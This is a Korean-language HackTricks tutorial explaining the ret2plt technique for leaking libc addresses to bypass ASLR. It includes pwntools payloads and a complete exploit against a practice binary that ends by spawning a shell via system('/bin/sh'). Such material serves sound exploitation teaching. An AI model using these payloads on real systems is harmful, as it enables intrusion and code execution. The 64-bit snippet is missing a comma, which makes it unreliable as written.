Ret2plt

Reading time: 3 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기

Basic Information

이 기술의 목표는 ASLR을 우회하기 위해 PLT의 함수에서 주소를 누출하는 것입니다. 예를 들어, libc의 puts 함수의 주소를 누출하면, libc의 기본 주소를 계산하고 다른 함수에 접근하기 위한 오프셋을 계산할 수 있습니다.

이는 pwntools 페이로드를 사용하여 수행할 수 있습니다 (여기에서):

python
# 32-bit ret2plt
payload = flat(
b'A' * padding,
elf.plt['puts'],
elf.symbols['main'],
elf.got['puts']
)

# 64-bit
payload = flat(
b'A' * padding,
POP_RDI,
elf.got['puts']
elf.plt['puts'],
elf.symbols['main']
)

puts (PLT의 주소를 사용하여)가 GOT(전역 오프셋 테이블)에 위치한 puts의 주소로 호출되는 방식을 주목하세요. 이는 putsputs의 GOT 항목을 출력할 때, 이 항목이 메모리에서 puts의 정확한 주소를 포함하게 되기 때문입니다.

또한 main의 주소가 익스플로잇에서 사용되어 puts의 실행이 끝날 때 바이너리가 종료되는 대신 main을 다시 호출합니다 (따라서 누출된 주소는 계속 유효합니다).

caution

이 작업이 수행되기 위해서는 **바이너리가 PIE로 컴파일될 수 없거나, PLT, GOT 및 main의 주소를 알기 위해 PIE를 우회할 수 있는 누출을 찾아야 합니다. 그렇지 않으면 먼저 PIE를 우회해야 합니다.

이 우회에 대한 전체 예제를 여기에서 찾을 수 있습니다. 이것은 그 예제에서의 최종 익스플로잇이었습니다:

python
from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

payload = flat(
'A' * 32,
elf.plt['puts'],
elf.sym['main'],
elf.got['puts']
)

p.sendline(payload)

puts_leak = u32(p.recv(4))
p.recvlines(2)

libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
'A' * 32,
libc.sym['system'],
libc.sym['exit'],
next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()

다른 예제 및 참고자료

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks 지원하기